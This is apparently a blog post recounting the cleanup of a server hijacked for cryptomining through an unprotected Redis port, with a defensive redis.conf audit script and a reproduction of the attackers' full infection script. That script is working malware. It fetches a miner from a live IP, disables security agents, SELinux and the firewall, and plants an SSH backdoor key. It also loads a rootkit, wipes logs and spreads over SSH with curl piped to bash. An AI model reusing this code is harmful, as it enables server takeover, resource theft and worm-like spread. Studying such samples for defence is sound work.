Server hijacked for cryptomining (script-file attack) (hopefully this post solves your problem)

The server got attacked, and if it wasn't fixed it was going to be restricted.
I went through a lot of material to deal with it; I had only just got the server and knew nothing.
Checking with the command below shows there really is a scheduled task starting it:
vim /var/log/cron

It matches the error shown on the console.

This is usually an open-port problem. At first I thought it was Docker, so I closed the Docker ports, but according to what's online it is more likely something like Redis or another service whose port was exposed without any security configuration.
Pay attention to exposed ports, or being turned into a mining rig will give you plenty of grief.
At this point you can try closing the Redis port; what I did was
check Redis first.

Connect to Redis. First you need to know where your Redis is installed:
whereis redis-cli

Then connect:
redis-cli -p 6379
to enter Redis.

Check whether your Redis has a password configured.

If it doesn't, a script can break into your server from here very easily:
it uses curl to download an sh file, runs it, and you're done for.
Set a Redis password (temporary; the permanent way is below):
config set requirepass ************
Just set it like that.
After you exit, operations without authenticating are no longer allowed.

But this method is temporary; it is lost after a restart.
So we set it in the config file.
Find redis.conf


and edit it.
In the editor you can type /requirepass foobared
to jump to the right spot, then
requirepass *******  is all you need.
Restart Redis:
systemctl restart redis.service
systemctl status redis   to check the status.
Check whether the configuration took effect:
as before, go into the directory and log in to Redis,
then type  get key*
and you'll find it is refused.

So we authenticate:
auth ******  (the password you just set)
The output is OK,
and after that Redis can be used normally.
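As an added example (not code from the original post), the POSIX shell audit below checks a redis.conf for the "open port" weakness described above: requirepass, the directive the post sets, plus bind and protected-mode, which go one step beyond the post and decide whether the port is reachable from outside at all. The two sample configs are constructed, not taken from the compromised host.

```shell
#!/bin/sh
# Added example, not code from the original post: audit a redis.conf for the
# "open port" weakness described above. It checks requirepass (the directive
# the post sets) and goes one step beyond the post by also checking bind and
# protected-mode, which decide whether the port is reachable from outside.

# Effective value of a directive: the last uncommented occurrence wins,
# which is how redis-server resolves duplicate lines.
conf_value() {   # $1 = directive, $2 = path to redis.conf
    grep -E "^[[:space:]]*$1[[:space:]]" "$2" | tail -n 1 |
        sed -E "s/^[[:space:]]*$1[[:space:]]*//"
}

# Prints one finding per line; prints nothing for a well-configured file.
audit_redis_conf() {   # $1 = path to redis.conf
    pass=$(conf_value requirepass "$1")
    case "$pass" in
        ""|'""') echo "requirepass: not set; anyone who reaches the port has full access, including CONFIG SET" ;;
        *) [ "${#pass}" -lt 16 ] && echo "requirepass: only ${#pass} characters; use a long random secret" ;;
    esac
    bind=$(conf_value bind "$1")
    case " $bind " in
        "  "|*" 0.0.0.0 "*|*" * "*)
            echo "bind: '${bind:-<absent>}' listens on every interface; use bind 127.0.0.1 unless remote clients are required" ;;
    esac
    [ "$(conf_value protected-mode "$1")" = "no" ] &&
        echo "protected-mode: no; when enabled, an instance without a password refuses non-loopback clients"
    return 0
}

# Number of findings, for use in scripts.
redis_finding_count() { audit_redis_conf "$1" | awk 'END { print NR }'; }

# Constructed sample configs (not taken from the compromised host in the post).
SAMPLE_DIR=$(mktemp -d)
WEAK_CONF="$SAMPLE_DIR/redis-weak.conf"
HARD_CONF="$SAMPLE_DIR/redis-hardened.conf"
cat > "$WEAK_CONF" <<'EOF'
# reachable from anywhere, no authentication: the state the post describes
port 6379
bind 0.0.0.0
protected-mode no
# requirepass foobared
EOF
cat > "$HARD_CONF" <<'EOF'
port 6379
bind 127.0.0.1 ::1
protected-mode yes
requirepass <LONG-RANDOM-SECRET-PLACEHOLDER-32CHARS>
EOF

audit_redis_conf "$WEAK_CONF"    # three findings
audit_redis_conf "$HARD_CONF"    # no output
```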

At this point I planned to reboot the server to see whether it would still be mining, but I already knew the answer: the attacker came in through the exposed interface and had already finished setting up the miner, so a reboot wasn't going to stop it.
In the root directory, use  ll -rta
to see which files were modified (the script ran at around 10:00 on 9/25).

Concentrate on files whose timestamps are close to the date of the incident; anything years or months apart can be ignored.
Check /home, /root and the like carefully.
I found the problem in /root first.

Then I saw that the timestamps on these files were indeed exactly the same, 9/25.
authorized_keys, which is used for passwordless login.
So I started deleting.

So I cleared its attributes; fundamentally that is just a system permission setting, so no harm done.

Then I wanted to use chattr to change the file attributes.
Result: chattr: command not found
The script had uninstalled it. Great.
If yours is still there, you can skip this step {
Install chattr:
yum install e2fsprogs
Usually the package is still there and wasn't removed,
so it can be installed directly.

chattr itself is part of e2fsprogs.

But then another problem came up:
Failed to set locale, defaulting to C.UTF-8
Installation failed.
According to what I found, this is because the locale environment is not set up.
Run the locale command.

The fix is to run the following commands; after that, running locale no longer shows these problems:

echo "export LC_ALL=en_US.UTF-8" >> /etc/profile
source /etc/profile
Now continue the installation.

Still no good:
chattr is still not found.
I tried to search for chattr, because some blogs say chattr may have been moved elsewhere.
Switch to the root directory first, then run it; from other subdirectories it may not be found.
find -name chattr
This also turns up a pile of proc errors.
Roughly this is what came out:
find -name chattr
./var/lib/docker/overlay2/4362bde84fd652a9ab41989c1d6b5d688cb0d1345172265c142adb8cc776447c/diff/bin/chattr
./var/lib/docker/overlay2/8be99b28e5bc86f6d2158ca963df6ecac6a41e4b95a0e62f219f3bd2cebc14d3/diff/usr/bin/chattr
./var/lib/docker/overlay2/196f754ebc38c60aff435c92f2548d6808352eaf079d36cc5df49c592e2828be/diff/usr/bin/chattr
./var/lib/docker/overlay2/0b23070518ea4281899c2c772c207cb20c219330533d98fcaf930c90d72cdac9/diff/usr/bin/chattr
./var/lib/docker/overlay2/7a5f30a6ef8e0cc88330533f26f0c3bcc2f9ee85a850e27a726b74e48bcd0f5d/diff/usr/bin/chattr
./var/lib/docker/overlay2/1eadf06a371819054f343753563ecb36ce6fe4e1da9afd0b3fdd4aff15aeb883/diff/usr/bin/chattr
So I could start from here; this definitely had problems.
First I went to ./var/lib/docker and deleted overlay2/ outright,
clearing it out.
Trying again, yum said it was already installed.
So I figured yum was not going to work.
I'd uninstall those packages first, then download the package from the official site, extract it and see whether it works.
Process:
yum remove e2fsprogs
Removed successfully.

Find the tar.gz package yourself; I'm not putting a link here (Bilibili issue).

Upload it to the server.
I put it under /opt, then extracted it:
tar -xzvf e2fsprogs-1.46.5.tar.gz
Extraction finished; it took a while because memory and CPU were maxed out.

Then cd into the folder.

Compile:
./configure

make
make install
Build finished.
(If errors come up during compilation, search Baidu yourself; usually it is a missing environment dependency; install it or use another method.)
That's it.
Test:

If you got this far successfully, chattr should be installed.
It did not install successfully for me, ugh, so I kept looking for a method.
From a blog I found another method to try:
download the chattr.c file and upload it to the server.
The file address is https://github.com/posborne/linux-programming-interface-exercises/chattr.c

Delete everything related to chattr and e2fsprogs,
for example /usr/bin/chattr.
You can use whereis chattr to see where they are, then delete them.
yum install e2fsprogs   to reinstall.
After that chattr works again.

Then delete these things.

}
chattr -ia filename
chattr -i filename
Clear whatever attributes it has.
Next, deal with the mining malware files crypto and pnscan.
In the /usr/share directory
you can see the crypto file.
Delete everything related to it.

To be safe, run whereis crypto.
It shows

that it is located under /usr/share/man.
By now I wanted to delete this whole man folder.
lsattr to check the attributes of man:
it has the e attribute.

rm -rf man   to delete it.
Now look for the pnscan things.


Delete directly:
rm -rf pnscan
The files are deleted.
Then look at the processes.
Stop the ssh, python and similar processes first.
Then delete all the directories with the ia attribute.
Files under /etc/:
(cron.d, crontab)

/var/spool/ :


The high-CPU process isn't shown.
So either top has a problem or it is being deliberately hidden.
If you suspect top, you can use lsattr or other commands to check whether it has been tampered with,
or install htop to look at CPU and other parameters.
But with htop I couldn't see it either.
So this malware needs a closer look.
netstat -anp
You can see there really is another program running, and its process name is -
Action:
cat /etc/ld.so.preload
Output:


Because that directory contains many .so files and I didn't understand them, for now I deleted only the files named in the output above.
rm -rf '[cmake].so'   result: operation not permitted; the more it refuses, the more certain I am this file is bad.
chattr -i '[cmake]'.so


Clean up /etc/ld.so.preload.
I planned to delete these files first.

During deletion one error was reported;
shown here:

Change the attributes of the ld.so.preload file (mine had the i attribute).
Then run:
Reference:
(blog address: https://blog.csdn.net/zhanghenan123/article/details/88718898)
echo "" > /etc/ld.so.preload
chattr +i /etc
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
chattr +i /var/spool/cron/
rm -f /usr/local/lib/lbb.so
chattr +i /usr/local/lib
killall kworkerds
rm -f /var/tmp/kworkerds*
rm -f /var/tmp/1.so
rm -f /tmp/kworkerds*
rm -f /tmp/1.so
rm -f /var/tmp/wc.conf
rm -f /tmp/wc.conf
Basically it deletes things and then locks them so they can't be modified again.

The error in the middle was because I had already deleted the parent directory of one of the files earlier.
/etc/rc.d/  delete the rc.d-related files under etc as well; the ones that delete without complaint are usually the malware's.


Now use top to take a look.
The command can now be located.

Keep going!
At this point it is quite clear: the malware's pid is randomly assigned, and the command is [cmake].
masscan needs attention too.
Use ps -ef | grep pid to find where the file is,
locate the file,
inspect it,
and delete it:
rm -rf cmake
rm -rf cmake.pid   file
Everything related is deleted.

I was worried about hidden files.
Sure enough, the plain ls listing did not include this one,


nor this ..lph/

Its creation time is 9/25, matching the intrusion time.
So I deleted it:
rm -rf ..lph/
Check httpd.

/bin/bash: I found nothing wrong.
Under /etc/.hjttpd/.../ I found problems.

Note that plain ls shows nothing here; use ls -a to see the hidden files. Wow, there are a lot; my first reaction was to delete them all.

rm -rf .../   still not allowed.

top command
kill -9 pid  (to kill everything httpd-related)
kill -9 all processes with high CPU usage.
OK, at this point it's done.


Finally, here is the script for everyone's reference,
to make it easier to study, because studying the script is what really explains what happened to the server.
#!/bin/bash
##variables
domain=205.185.118.246
mainurl=http://$domain/b2f628/
proxyport=1414
#init environment
m_command()
{
if [ -x /bin/chattr ];then
mv /bin/chattr /bin/zzhcht
elif [ -x /usr/bin/chattr ];then
mv /usr/bin/chattr /usr/bin/zzhcht
fi
if [ -x /bin/zzhcht ];then
export CHATTR=/bin/zzhcht
elif [ -x /usr/bin/zzhcht ];then
export CHATTR=/usr/bin/zzhcht
else
export CHATTR=chattr
fi
if [ -f /bin/curl ];then
export CURL_CMD="/bin/curl"
elif [ -f /usr/bin/curl ];then
export CURL_CMD="/usr/bin/curl"
fi
if [ -f /bin/wget ];then
export WGET_CMD="/bin/wget"
elif [ -f /usr/bin/wget ];then
export WGET_CMD="/usr/bin/wget"
fi
if [ -x "/usr/bin/wge" -o -x "/bin/wge" ];then
if [ -f /bin/wge ];then
export WGET_CMD="/bin/wge"
elif [ -f /usr/bin/wge ];then
export WGET_CMD="/usr/bin/wge"
fi
mv /bin/wge /bin/wls || mv /usr/bin/wge /usr/bin/wls
fi
if [ -x "/usr/bin/wd1" -o -x "/bin/wd1" ];then
if [ -f /usr/bin/wd1 ];then
export WGET_CMD="/usr/bin/wd1"
elif [ -f /bin/wd1 ];then
export WGET_CMD="/bin/wd1"
fi
mv /bin/wd1 /bin/wls || mv /usr/bin/wd1 /usr/bin/wls
fi
if [ -x "/usr/bin/wget1" -o -x "/bin/wget1" ];then
if [ -f /bin/wget1 ];then
export WGET_CMD="/bin/wget1"
elif [ -f /usr/bin/wget1 ];then
export WGET_CMD="/usr/bin/wget1"
fi
mv /bin/wget1 /bin/wls || mv /usr/bin/wget1 /usr/bin/wls
fi
if [ -x "/usr/bin/wdt" -o -x "/bin/wdt" ];then
if [ -f /bin/wdt ];then
export WGET_CMD="/bin/wdt"
elif [ -f /usr/bin/wdt ];then
export WGET_CMD="/usr/bin/wdt"
fi
mv /bin/wdt /bin/wls || mv /usr/bin/wdt /usr/bin/wls
fi
if [ -x "/usr/bin/wdz" -o -x "/bin/wdz" ];then
if [ -f /usr/bin/wdz ];then
export WGET_CMD="/usr/bin/wdz"
elif [ -f /bin/wdz ];then
export WGET_CMD="/bin/wdz"
fi
cp /bin/wdz /bin/wls || cp /usr/bin/wdz /usr/bin/wls
fi
if [ -x "/usr/bin/xget" -o -x "bin/xget" ];then
if [ -f /bin/xget ];then
export WGET_CMD="/bin/xget"
elif [ -f /usr/bin/xget ];then
export WGET_CMD="/usr/bin/xget"
fi
mv /bin/xget /bin/wls || /usr/bin/xget /usr/bin/wls
fi
if [ -x "/bin/wls" ];then
export WGET_CMD="/bin/wls"
elif [ -x "/usr/bin/wls" ];then
export WGET_CMD="/usr/bin/wls"
else
if [ $(command -v yum) ];then
rpm -e --nodeps wget
yum remove -y wget
yum install -y wget
else
apt-get remove -y wget
apt-get install -y wget
fi
mv /bin/wget /bin/wls || mv /usr/bin/wget /usr/bin/wls
if [ -f /bin/wls ];then
export WGET_CMD="/bin/wls"
elif [ -f /usr/bin/wls ];then
export WGET_CMD="/usr/bin/wls"
fi
fi
if [ -x "/usr/bin/cd1" -o -x "/bin/cd1" ];then
if [ -f /bin/cd1 ];then
export CURL_CMD="/bin/cd1"
elif [ -f /usr/bin/cd1 ];then
export CURL_CMD="/usr/bin/cd1"
fi
mv /bin/cd1 /bin/cls || mv /usr/bin/cd1 /usr/bin/cls
fi
if [ -x "/usr/bin/curl" -o -x "/bin/curl" ];then
if [ -f /bin/curl ];then
export CURL_CMD="/bin/curl"
elif [ -f /usr/bin/curl ];then
export CURL_CMD="/usr/bin/curl"
fi
mv /bin/curl /bin/cls || mv /usr/bin/curl /usr/bin/cls
fi
if [ -x "/usr/bin/cdz" -o -x "/bin/cdz" ];then
if [ -f /bin/cdz ];then
export CURL_CMD="/bin/cdz"
elif [ -f /usr/bin/cdz ];then
export CURL_CMD="/usr/bin/cdz"
fi
cp /bin/cdz /bin/cls || cp /usr/bin/cdz /usr/bin/cls
fi
if [ -x "/usr/bin/cur" -o -x "/bin/cur" ];then
if [ -f /bin/cur ];then
export CURL_CMD="/bin/cur"
elif [ -f /usr/bin/cur ];then
export CURL_CMD="/usr/bin/cur"
fi
mv /bin/cur /bin/cls || mv /usr/bin/cur /usr/bin/cls
fi
if [ -x "/usr/bin/TNTcurl" -o -x "/bin/TNTcurl" ];then
if [ -f /bin/TNTcurl ];then
export CURL_CMD="/bin/TNTcurl"
elif [ -f /usr/bin/TNTcurl ];then
export CURL_CMD="/usr/bin/TNTcurl"
fi
mv /bin/TNTcurl /bin/cls || mv /usr/bin/TNTcurl /usr/bin/cls
fi
if [ -x "/usr/bin/curltnt" -o -x "/bin/curltnt" ];then
if [ -f /bin/curltnt ];then
export CURL_CMD="/bin/curltnt"
elif [ -f /usr/bin/curltxt ];then
export CURL_CMD="/usr/bin/curltnt"
fi
mv /bin/curltnt /bin/cls || mv /usr/bin/curltnt /usr/bin/cls
fi
if [ -x "/usr/bin/curl1" -o -x "/bin/curl1" ];then
if [ -f /bin/curl1 ];then
export CURL_CMD="/bin/curl1"
elif [ -f /usr/bin/curl1 ];then
export CURL_CMD="/usr/bin/curl1"
fi
mv /bin/curl1 /bin/cls || mv /usr/bin/curl1 /usr/bin/cls
fi
if [ -x "/usr/bin/cdt" -o -x "/bin/cdt" ];then
if [ -f /bin/cdt ];then
export CURL_CMD="/bin/cdt"
elif [ -f /usr/bin/cdt ];then
export CURL_CMD="/usr/bin/cdt"
fi
mv /bin/cdt /bin/cls || mv /usr/bin/cdt /usr/bin/cls
fi
if [ -x "/usr/bin/xcurl" -o -x "/bin/xcurl" ];then
if [ -f /bin/xcurl ];then
export CURL_CMD="/bin/xcurl"
elif [ -f /usr/bin/xcurl ];then
export CURL_CMD="/usr/bin/xcurl"
fi
mv /bin/xcurl /bin/cls || mv /usr/bin/xcurl /usr/bin/wls
fi
if [ -x "/usr/bin/cls" ];then
export CURL_CMD="/usr/bin/cls"
elif [ -x "/bin/cls" ];then
export CURL_CMD="/bin/cls"
else
if [ $(command -v yum) ];then
rpm -e --nodeps curl
yum remove curl
yum install -y curl
else
apt-get remove curl
apt-get install -y curl
fi
mv /bin/curl /bin/cls || mv /usr/bin/curl /usr/bin/cls
if [ -f /bin/cls ];then
export CURL_CMD="/bin/cls"
elif [ -f /usr/bin/cls ];then
export CURL_CMD="/usr/bin/cls"
fi
fi
}
yum_ins()
{
yum clean all
for pkg in gcc make kmod net-tools "kernel-devel-uname-r == $(uname -r)"
do
yum install -y $pkg
done
}
apk_ins()
{
apk update
for pkg in gcc make kmod linux-headers net-tools
do
apk add $pkg
done
}
apt_ins()
{
apt update --fix-missing
for pkg in gcc make kmod net-tools linux-headers-$(uname -r)
do
apt-get install -y $pkg
done
}
ins_package()
{
if
type apk 2>/dev/null 1>/dev/null;
then
apk_ins
fi
if
type apt 2>/dev/null 1>/dev/null;
then
apt_ins
fi
if
type yum 2>/dev/null 1>/dev/null;
then
yum_ins
fi
}
check_exist()
{
if [ -x /usr/bin/netstat -o /bin/netstat ]
then
for pt in $(netstat -an|grep EST|grep "$proxyport"|awk '{print $5}'|awk -F ":" '{print $NF}')
do
if [ "$pt" == "$proxyport" ];then
echo "miner running"
exit 1
else
echo "miner may not running,check next port"
fi
done
else
echo "haha"
fi
}
clean_monitor()
{
iptables -F
ulimit -n 65535 2>/dev/null 1>/dev/null
export LC_ALL=C
HISTCONTROL="ignorespace${HISTCONTROL:+:$HISTCONTROL}" 2>/dev/null 1>/dev/null
export HISTFILE=/dev/null 2>/dev/null 1>/dev/null
unset HISTFILE 2>/dev/null 1>/dev/null
shopt -ou history 2>/dev/null 1>/dev/null
set +o history 2>/dev/null 1>/dev/null
HISTSIZE=0 2>/dev/null 1>/dev/null
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
setenforce 0 2>/dev/null 1>/dev/null
echo SELINUX=disabled >/etc/selinux/config 2>/dev/null
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop apparmor 2>/dev/null 1>/dev/null ; systemctl disable apparmor 2>/dev/null 1>/dev/null ; else service apparmor stop 2>/dev/null 1>/dev/null ; fi
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop aliyun.service 2>/dev/null 1>/dev/null ; systemctl disable aliyun.service 2>/dev/null 1>/dev/null ; else service aliyun.service stop 2>/dev/null 1>/dev/null ; fi
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % 2>/dev/null 1>/dev/null
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % 2>/dev/null 1>/dev/null
if [ -d "/usr/local/aegis/" ]; then rm -rf /usr/local/aegis 2>/dev/null 1>/dev/null ; fi
if type ufw 2>/dev/null 1>/dev/null; then ufw disable 2>/dev/null 1>/dev/null ; fi
if type iptables 2>/dev/null 1>/dev/null; then iptables -F 2>/dev/null 1>/dev/null ; fi
sysctl kernel.nmi_watchdog=0 2>/dev/null 1>/dev/null
if [ -f "/proc/sys/kernel/nmi_watchdog" ]; then echo '0' >/proc/sys/kernel/nmi_watchdog 2>/dev/null ; fi
if [ -f "/etc/sysctl.conf" ]; then echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 2>/dev/null ; fi
if ps aux | grep -i '[a]liyun' 2>/dev/null 1>/dev/null; then
echo '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' | base64 -d | bash 2>/dev/null 1>/dev/null
echo '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' | base64 -d | bash 2>/dev/null 1>/dev/null
pkill aliyun-service 2>/dev/null 1>/dev/null
if [ -f "/etc/init.d/agentwatch" ]; then rm -rf /etc/init.d/agentwatch 2>/dev/null 1>/dev/null ; fi
if [ -f "/usr/sbin/aliyun-service" ]; then rm -fr /usr/sbin/aliyun-service 2>/dev/null 1>/dev/null ; fi
if [ -d "/usr/local/aegis/" ]; then rm -rf /usr/local/aegis* 2>/dev/null 1>/dev/null ; fi
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop aliyun.service 2>/dev/null 1>/dev/null ; else service aliyun.service stop 2>/dev/null 1>/dev/null ; fi
if type systemctl 2>/dev/null 1>/dev/null; then systemctl disable aliyun.service 2>/dev/null 1>/dev/null ; else if [ -f "/etc/init.d/aliyun" ]; then rm -fr /etc/init.d/aliyun 2>/dev/null 1>/dev/null ; fi ; fi
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop bcm-agent 2>/dev/null 1>/dev/null ; else service bcm-agent stop 2>/dev/null 1>/dev/null ; fi
if type yum 2>/dev/null 1>/dev/null; then yum remove bcm-agent -y 2>/dev/null 1>/dev/null ; fi
if type apt-get 2>/dev/null 1>/dev/null; then apt-get remove bcm-agent -y 2>/dev/null 1>/dev/null ; fi
elif ps aux | grep -i '[y]unjing' 2>/dev/null 1>/dev/null; then
if [ -f "/usr/local/qcloud/stargate/admin/uninstall.sh" ]; then /usr/local/qcloud/stargate/admin/uninstall.sh 2>/dev/null 1>/dev/null ; fi
if [ -f "/usr/local/qcloud/YunJing/uninst.sh" ]; then /usr/local/qcloud/YunJing/uninst.sh 2>/dev/null 1>/dev/null ; fi
if [ -f "/usr/local/qcloud/monitor/barad/admin/uninstall.sh" ]; then /usr/local/qcloud/monitor/barad/admin/uninstall.sh 2>/dev/null 1>/dev/null ; fi
fi
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
if ps aux | grep -i '[a]liyun'; then
${CURL_CMD} http://update.aegis.aliyun.com/download/uninstall.sh | bash
${CURL_CMD} http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
else
if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 ]; then
/usr/local/cloudmonitor/CmsGoAgent.linux-amd64 stop && /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 uninstall && rm -rf /usr/local/cloudmonitor
else
echo "ali cloud monitor not running"
fi
fi
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
}
function SetupNameServers(){
grep -q 8.8.8.8 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; ${CHATTR} +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
grep -q 8.8.4.4 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; ${CHATTR} +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
}
clmo() {
if ps aux | grep -i '[a]liyun'; then
echo "this is ali cloud"
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
until [ "$number" -eq 0 ]; do
systemctl stop aliyun
systemctl stop aegis
ps -ef|grep -i aegis|awk '{print $2}'|xargs kill -HUP
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
done
while [ -d /usr/local/aegis ]
do
ps -ef|grep -i AliSecGuard|grep -v grep |awk '{print $2}'|xargs kill -HUP
path=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}')
num=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}'|wc -l)
if [ $num -gt 0 ]
then
echo "$path" exist
$path --stopdriver
else
echo "no AliSecGuard process"
fi
rm -rf /usr/local/aegis
done
else
echo "it's not ali cloud"
fi
}
function clean_cron(){
${CHATTR} -R -ia /var/spool/cron
tntrecht -R -ia /var/spool/cron
${CHATTR} -ia /etc/crontab
tntrecht -ia /etc/crontab
${CHATTR} -R -ia /etc/cron.d
tntrecht -R -ia /etc/cron.d
${CHATTR} -R -ia /var/spool/cron/crontabs
tntrecht -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
}
function lock_cron()
{
${CHATTR} -R +ia /var/spool/cron
touch /etc/crontab
${CHATTR} +ia /etc/crontab
${CHATTR} -R +ia /var/spool/cron/crontabs
${CHATTR} -R +ia /etc/cron.d
}
function makesshaxx(){
echo "begin makessh"
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver"
mkdir /root/.ssh/ -p
touch /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q root@puppetserver /root/.ssh/authorized_keys || ${CHATTR} -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; ${CHATTR} +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys
grep -q root@puppetserver /root/.ssh/authorized_keys2 || ${CHATTR} -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; ${CHATTR} +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2
}
download_f(){
config_url=http://205.185.118.246/bWVkaWEK/config.json
miner_url=http://205.185.118.246/bWVkaWEK/xm.tar
export MOHOME="/usr/share"
cd ${MOHOME}
${WGET_CMD} --tries=3 --timeout=10 -O ${MOHOME}/[cmake].pid ${config_url}
echo ${config_url}
if [ -f ${MOHOME}/\[cmake\] ];then
echo "miner file exists"
else
${WGET_CMD} --tries=10 --timeout=10 -O ${MOHOME}/crypto ${miner_url}
if [ $? -ne 0 ];then
${WGET_CMD} --tries=2 --timeout=10 -O ${MOHOME}/crypto ${miner_url_backup}
fi
if tar -xf "${MOHOME}/crypto" -C ${MOHOME};then
mv ${MOHOME}/xmrig ${MOHOME}/[cmake]
chmod a+x ${MOHOME}/[cmake]
rm -rf ${MOHOME}/xmrig*
fi
fi
}
setup_s(){
grep -q cmake /etc/systemd/system/cmake.service
if [ $? -eq 0 ]
then
echo service exist
else
rm -f /etc/systemd/system/cmake.service
cat >/tmp/ext4.service << EOLB
[Unit]
Description=crypto system service
After=network.target
[Service]
Type=forking
GuessMainPID=no
ExecStart=${MOHOME}/[cmake] --config=${MOHOME}/[cmake].pid
WorkingDirectory=${MOHOME}
Restart=always
Nice=0
RestartSec=3
[Install]
WantedBy=multi-user.target
EOLB
fi
mv /tmp/ext4.service /etc/systemd/system/cmake.service
systemctl daemon-reload
systemctl start cmake
systemctl enable cmake
}
exec_f(){
for nhid in $(ps aux | grep -v grep | grep '/usr/share/\[cmake\]\|masscan' | awk '{print $2}')
do
kill -31 $nhid
done
}
hide_f(){
if [ -d "/usr/src/kernels/$(uname -r)/lib" ]
then
hi_home=${MOHOME}/..hide
mkdir -p $hi_home
if [ ! -d "$hi_home" ]; then mkdir -p $hi_home ; fi
hf='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'
echo $hf|base64 -d >$hi_home/hf.tar
tar -xf $hi_home/hf.tar -C $hi_home/
cd $hi_home/
make
if [ -f "$hi_home/diamorphine.ko" ]
then
insmod diamorphine.ko
else
echo "dia hide false"
fi
else
echo "other hide method"
fi
}
exec_hide(){
hi_home=/usr/share/..hide
if [ -f "$hi_home/diamorphine.ko" ]
then
echo "diamorphine loaded1"
echo "hide diamorphine1"
exec_f
else
echo "diamorphine not loaded,execute load process"
hide_f
exec_f
fi
}
localgo() {
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- ${mainurl/b.sh} | bash >/dev/null 2>&1 &' & done
fi
}
exec_hide2(){
BINARY_NAME="[cmake]"
H2P=${MOHOME}/..lph
if [ "$UID" = "0" ];then
LHB_MAKE='YWxsOiBsaWJwcm9jZXNzaGlkZXIuc28KCmxpYnByb2Nlc3NoaWRlci5zbzogcHJvY2Vzc2hpZGVyLmMKCWdjYyAtV2FsbCAtZlBJQyAtc2hhcmVkIC1vIGxpYnByb2Nlc3NoaWRlci5zbyBwcm9jZXNzaGlkZXIuYyAtbGRsCgouUEhPTlkgY2xlYW46CglybSAtZiBsaWJwcm9jZXNzaGlkZXIuc28KCg=='
PROCHIDE='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'
